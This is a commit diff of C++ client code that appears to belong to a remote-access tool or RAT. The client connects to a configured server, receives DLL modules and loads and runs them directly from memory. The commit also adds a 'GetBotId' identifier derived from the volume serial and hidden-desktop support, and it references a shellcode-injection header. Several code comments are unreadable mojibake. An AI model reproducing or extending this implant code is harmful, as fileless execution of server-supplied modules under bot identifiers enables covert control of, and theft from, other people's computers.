Reserve for running customized module in future
This commit is contained in:
yuanyuanxiang
@@ -103,7 +103,7 @@ DWORD WINAPI ThreadProc(LPVOID lParam)
|
||||
template <class Manager, int n> DWORD WINAPI LoopManager(LPVOID lParam)
|
||||
{
|
||||
ThreadInfo *pInfo = (ThreadInfo *)lParam;
|
||||
IOCPClient *ClientObject = pInfo->p;
|
||||
IOCPClient *ClientObject = (IOCPClient *)pInfo->p;
|
||||
CONNECT_ADDRESS& g_SETTINGS(*(pInfo->conn));
|
||||
if (ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort()))
|
||||
{
|
||||
|
||||
@@ -12,6 +12,7 @@
|
||||
#define ALGORITHM_GRAY 0
|
||||
#define ALGORITHM_DIFF 1
|
||||
#define ALGORITHM_H264 2
|
||||
#define ALGORITHM_HOME 3
|
||||
|
||||
#define MAX_CURSOR_TYPE 16
|
||||
|
||||
|
||||
@@ -10,6 +10,7 @@
|
||||
#include <corecrt_io.h>
|
||||
#include "ClientDll.h"
|
||||
#include "MemoryModule.h"
|
||||
#include "common/dllRunner.h"
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
// Construction/Destruction
|
||||
@@ -61,20 +62,16 @@ UINT CKernelManager::GetAvailableIndex() {
|
||||
return -1;
|
||||
}
|
||||
|
||||
BOOL WriteBinaryToFile(const char* data, ULONGLONG size)
|
||||
BOOL WriteBinaryToFile(const char* data, ULONGLONG size, const char* name = "ServerDll.new")
|
||||
{
|
||||
if (size > 32 * 1024 * 1024) {
|
||||
Mprintf("WriteBinaryToFile fail: too large file size!!\n");
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
char path[_MAX_PATH], * p = path;
|
||||
GetModuleFileNameA(NULL, path, sizeof(path));
|
||||
while (*p) ++p;
|
||||
while ('\\' != *p) --p;
|
||||
strcpy(p + 1, "ServerDll.new");
|
||||
if (_access(path, 0)!=-1)
|
||||
strcpy(p + 1, name);
|
||||
if (_access(path, 0) != -1)
|
||||
{
|
||||
if (std::string("ServerDll.new")!=name) return TRUE;
|
||||
DeleteFileA(path);
|
||||
}
|
||||
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ģʽд<CABD><D0B4>
|
||||
@@ -113,11 +110,10 @@ BOOL WriteBinaryToFile(const char* data, ULONGLONG size)
|
||||
|
||||
typedef struct DllExecParam
|
||||
{
|
||||
State& exit;
|
||||
DllExecuteInfo info;
|
||||
PluginParam param;
|
||||
BYTE* buffer;
|
||||
DllExecParam(const DllExecuteInfo* dll, BYTE* data, State& status) : exit(status) {
|
||||
memcpy(&info, dll, sizeof(DllExecuteInfo));
|
||||
DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data) : info(dll), param(arg) {
|
||||
buffer = new BYTE[info.Size];
|
||||
memcpy(buffer, data, info.Size);
|
||||
}
|
||||
@@ -126,32 +122,64 @@ typedef struct DllExecParam
|
||||
}
|
||||
}DllExecParam;
|
||||
|
||||
|
||||
class MemoryDllRunner : public DllRunner {
|
||||
protected:
|
||||
HMEMORYMODULE m_mod;
|
||||
public:
|
||||
MemoryDllRunner() : m_mod(nullptr) {}
|
||||
virtual void* LoadLibraryA(const char* data, int size) {
|
||||
return (m_mod = ::MemoryLoadLibrary(data, size));
|
||||
}
|
||||
virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) {
|
||||
return ::MemoryGetProcAddress((HMEMORYMODULE)mod, lpProcName);
|
||||
}
|
||||
virtual BOOL FreeLibrary(void* mod) {
|
||||
::MemoryFreeLibrary((HMEMORYMODULE)mod);
|
||||
return TRUE;
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
DWORD WINAPI ExecuteDLLProc(LPVOID param) {
|
||||
DllExecParam* dll = (DllExecParam*)param;
|
||||
HMEMORYMODULE module = MemoryLoadLibrary(dll->buffer, dll->info.Size);
|
||||
DllExecuteInfo info = dll->info;
|
||||
PluginParam pThread = dll->param;
|
||||
#ifdef _DEBUG
|
||||
WriteBinaryToFile((char*)dll->buffer, info.Size, info.Name);
|
||||
DllRunner* runner = new DefaultDllRunner(info.Name);
|
||||
#else
|
||||
DllRunner* runner = new MemoryDllRunner();
|
||||
#endif
|
||||
HMEMORYMODULE module = runner->LoadLibraryA((char*)dll->buffer, info.Size);
|
||||
if (module) {
|
||||
DllExecuteInfo info = dll->info;
|
||||
if (info.Func[0]) {
|
||||
FARPROC proc = MemoryGetProcAddress(module, info.Func);
|
||||
if (proc) {
|
||||
switch (info.CallType)
|
||||
{
|
||||
case CALLTYPE_DEFAULT:
|
||||
((CallTypeDefault)proc)();
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
else { // û<><C3BB>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB><EFBFBD><EFBFBD>DLL
|
||||
while (S_CLIENT_EXIT != dll->exit) {
|
||||
switch (info.CallType)
|
||||
{
|
||||
case CALLTYPE_DEFAULT:
|
||||
while (S_CLIENT_EXIT != *pThread.Exit)
|
||||
Sleep(1000);
|
||||
break;
|
||||
case CALLTYPE_IOCPTHREAD: {
|
||||
PTHREAD_START_ROUTINE proc = (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run");
|
||||
Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
|
||||
if (proc) {
|
||||
proc(&pThread);
|
||||
}else {
|
||||
while (S_CLIENT_EXIT != *pThread.Exit)
|
||||
Sleep(1000);
|
||||
}
|
||||
break;
|
||||
}
|
||||
MemoryFreeLibrary(module);
|
||||
default:
|
||||
break;
|
||||
}
|
||||
runner->FreeLibrary(module);
|
||||
}
|
||||
else {
|
||||
Mprintf("MemoryLoadLibrary '%s' failed\n", info.Name);
|
||||
}
|
||||
SAFE_DELETE(dll);
|
||||
SAFE_DELETE(runner);
|
||||
return 0x20250529;
|
||||
}
|
||||
|
||||
@@ -160,21 +188,24 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
|
||||
bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT;
|
||||
if ((m_ulThreadCount = GetAvailableIndex()) == -1 && !isExit) {
|
||||
return Mprintf("CKernelManager: The number of threads exceeds the limit.\n");
|
||||
} else if (!isExit){
|
||||
}
|
||||
else if (!isExit) {
|
||||
m_hThread[m_ulThreadCount].p = nullptr;
|
||||
m_hThread[m_ulThreadCount].conn = m_conn;
|
||||
}
|
||||
|
||||
switch(szBuffer[0])
|
||||
switch (szBuffer[0])
|
||||
{
|
||||
case CMD_EXECUTE_DLL: {
|
||||
#ifdef _WIN64
|
||||
const int sz = 1 + sizeof(DllExecuteInfo);
|
||||
if (ulLength <= sz)break;
|
||||
DllExecuteInfo* info = (DllExecuteInfo*)(szBuffer + 1);
|
||||
if (info->Size == ulLength - sz)
|
||||
CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(info, szBuffer + sz, g_bExit), 0, NULL));
|
||||
Mprintf("Execute '%s'%s succeed: %d Length: %d\n", info->Name, info->Func, szBuffer[1], info->Size);
|
||||
if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
|
||||
PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit);
|
||||
CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, szBuffer + sz), 0, NULL));
|
||||
Mprintf("Execute '%s'%d succeed: %d Length: %d\n", info->Name, info->CallType, szBuffer[1], info->Size);
|
||||
}
|
||||
#endif
|
||||
break;
|
||||
}
|
||||
|
||||
@@ -72,17 +72,6 @@ private:
|
||||
}
|
||||
};
|
||||
|
||||
// <20>߳<EFBFBD><DFB3><EFBFBD>Ϣ<EFBFBD>ṹ<EFBFBD><E1B9B9>, <20><><EFBFBD><EFBFBD>3<EFBFBD><33><EFBFBD><EFBFBD>Ա: <20><><EFBFBD><EFBFBD>״̬(run)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(h)<29><>ͨѶ<CDA8>ͻ<EFBFBD><CDBB><EFBFBD>(p).
|
||||
struct ThreadInfo
|
||||
{
|
||||
BOOL run;
|
||||
HANDLE h;
|
||||
IOCPClient *p;
|
||||
void* user;
|
||||
CONNECT_ADDRESS* conn;
|
||||
ThreadInfo() : run(TRUE), h(NULL), p(NULL), user(nullptr), conn(nullptr){ }
|
||||
};
|
||||
|
||||
class CKernelManager : public CManager
|
||||
{
|
||||
public:
|
||||
|
||||
@@ -14,7 +14,7 @@ typedef struct {
|
||||
HANDLE hEventTransferArg;
|
||||
} THREAD_ARGLIST, * LPTHREAD_ARGLIST;
|
||||
|
||||
BOOL SelectDesktop(TCHAR* name);
|
||||
HDESK SelectDesktop(TCHAR* name);
|
||||
|
||||
unsigned int __stdcall ThreadLoader(LPVOID param)
|
||||
{
|
||||
@@ -54,6 +54,41 @@ HANDLE MyCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
|
||||
return hThread;
|
||||
}
|
||||
|
||||
ULONG PseudoRand(ULONG* seed)
|
||||
{
|
||||
return (*seed = 1352459 * (*seed) + 2529004207);
|
||||
}
|
||||
|
||||
std::string GetBotId()
|
||||
{
|
||||
#define _T(p) p
|
||||
TCHAR botId[35] = { 0 };
|
||||
TCHAR windowsDirectory[MAX_PATH] = {};
|
||||
TCHAR volumeName[8] = { 0 };
|
||||
DWORD seed = 0;
|
||||
|
||||
if (GetWindowsDirectory(windowsDirectory, sizeof(windowsDirectory)))
|
||||
windowsDirectory[0] = _T('C');
|
||||
|
||||
volumeName[0] = windowsDirectory[0];
|
||||
volumeName[1] = _T(':');
|
||||
volumeName[2] = _T('\\');
|
||||
volumeName[3] = _T('\0');
|
||||
|
||||
GetVolumeInformation(volumeName, NULL, 0, &seed, 0, NULL, NULL, 0);
|
||||
|
||||
GUID guid = {};
|
||||
guid.Data1 = PseudoRand(&seed);
|
||||
|
||||
guid.Data2 = (USHORT)PseudoRand(&seed);
|
||||
guid.Data3 = (USHORT)PseudoRand(&seed);
|
||||
for (int i = 0; i < 8; i++)
|
||||
guid.Data4[i] = (UCHAR)PseudoRand(&seed);
|
||||
wsprintf(botId, _T("%08lX%04lX%lu"), guid.Data1, guid.Data3, *(ULONG*)&guid.Data4[2]);
|
||||
return botId;
|
||||
#undef _T(p)
|
||||
}
|
||||
|
||||
BOOL SelectHDESK(HDESK new_desktop)
|
||||
{
|
||||
HDESK old_desktop = GetThreadDesktop(GetCurrentThreadId());
|
||||
@@ -80,9 +115,9 @@ BOOL SelectHDESK(HDESK new_desktop)
|
||||
// Switches the current thread into a different desktop, by name
|
||||
// Calling with a valid desktop name will place the thread in that desktop.
|
||||
// Calling with a NULL name will place the thread in the current input desktop.
|
||||
BOOL SelectDesktop(TCHAR* name)
|
||||
HDESK SelectDesktop(TCHAR* name)
|
||||
{
|
||||
HDESK desktop;
|
||||
HDESK desktop = NULL;
|
||||
|
||||
if (name != NULL) {
|
||||
// Attempt to open the named desktop
|
||||
@@ -103,18 +138,18 @@ BOOL SelectDesktop(TCHAR* name)
|
||||
|
||||
// Did we succeed?
|
||||
if (desktop == NULL) {
|
||||
return FALSE;
|
||||
return NULL;
|
||||
}
|
||||
|
||||
// Switch to the new desktop
|
||||
if (!SelectHDESK(desktop)) {
|
||||
// Failed to enter the new desktop, so free it!
|
||||
CloseDesktop(desktop);
|
||||
return FALSE;
|
||||
return NULL;
|
||||
}
|
||||
|
||||
// We successfully switched desktops!
|
||||
return TRUE;
|
||||
return desktop;
|
||||
}
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
@@ -123,6 +158,7 @@ BOOL SelectDesktop(TCHAR* name)
|
||||
|
||||
CManager::CManager(IOCPClient* ClientObject) : g_bExit(ClientObject->g_bExit)
|
||||
{
|
||||
m_bReady = TRUE;
|
||||
m_ClientObject = ClientObject;
|
||||
m_ClientObject->setManagerCallBack(this, IOCPManager::DataProcess);
|
||||
|
||||
|
||||
@@ -12,6 +12,12 @@
|
||||
#include "..\common\commands.h"
|
||||
#include "IOCPClient.h"
|
||||
|
||||
#define ENABLE_VSCREEN 1
|
||||
|
||||
HDESK SelectDesktop(TCHAR* name);
|
||||
|
||||
std::string GetBotId();
|
||||
|
||||
typedef IOCPClient CClientSocket;
|
||||
|
||||
typedef IOCPClient ISocketBase;
|
||||
@@ -27,6 +33,7 @@ class CManager : public IOCPManager
|
||||
{
|
||||
public:
|
||||
State&g_bExit; // 1-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD> 2-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD>
|
||||
BOOL m_bReady;
|
||||
CManager(IOCPClient* ClientObject);
|
||||
virtual ~CManager();
|
||||
|
||||
@@ -37,6 +44,7 @@ public:
|
||||
VOID NotifyDialogIsOpen();
|
||||
|
||||
int Send(LPBYTE lpData, UINT nSize);
|
||||
virtual void SetReady(BOOL ready = true) { m_bReady = ready; }
|
||||
};
|
||||
|
||||
#endif // !defined(AFX_MANAGER_H__32F1A4B3_8EA6_40C5_B1DF_E469F03FEC30__INCLUDED_)
|
||||
|
||||
@@ -4,6 +4,7 @@
|
||||
#include "ShellcodeInj.h"
|
||||
#include <WS2tcpip.h>
|
||||
#include <common/commands.h>
|
||||
#include "common/dllRunner.h"
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
// <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
|
||||
@@ -113,32 +114,6 @@ typedef struct PkgHeader {
|
||||
}
|
||||
}PkgHeader;
|
||||
|
||||
// A DLL runner.
|
||||
class DllRunner {
|
||||
public:
|
||||
virtual void* LoadLibraryA(const char* path) = 0;
|
||||
virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) = 0;
|
||||
virtual BOOL FreeLibrary(void* mod) = 0;
|
||||
};
|
||||
|
||||
// Default DLL runner.
|
||||
class DefaultDllRunner : public DllRunner {
|
||||
private:
|
||||
HMODULE m_mod;
|
||||
public:
|
||||
DefaultDllRunner() : m_mod(nullptr) {}
|
||||
// Load DLL from the disk.
|
||||
virtual void* LoadLibraryA(const char* path) {
|
||||
return m_mod = ::LoadLibraryA(path);
|
||||
}
|
||||
virtual FARPROC GetProcAddress(void *mod, const char* lpProcName) {
|
||||
return ::GetProcAddress(m_mod, lpProcName);
|
||||
}
|
||||
virtual BOOL FreeLibrary(void* mod) {
|
||||
return ::FreeLibrary(m_mod);
|
||||
}
|
||||
};
|
||||
|
||||
// Memory DLL runner.
|
||||
class MemoryDllRunner : public DllRunner {
|
||||
protected:
|
||||
@@ -239,7 +214,7 @@ public:
|
||||
return buffer;
|
||||
}
|
||||
// Request DLL from the master.
|
||||
virtual void* LoadLibraryA(const char* path) {
|
||||
virtual void* LoadLibraryA(const char* path, int len=0) {
|
||||
int size = 0;
|
||||
auto buffer = ReceiveDll(size);
|
||||
if (nullptr == buffer)
|
||||
|
||||
Reference in New Issue
Block a user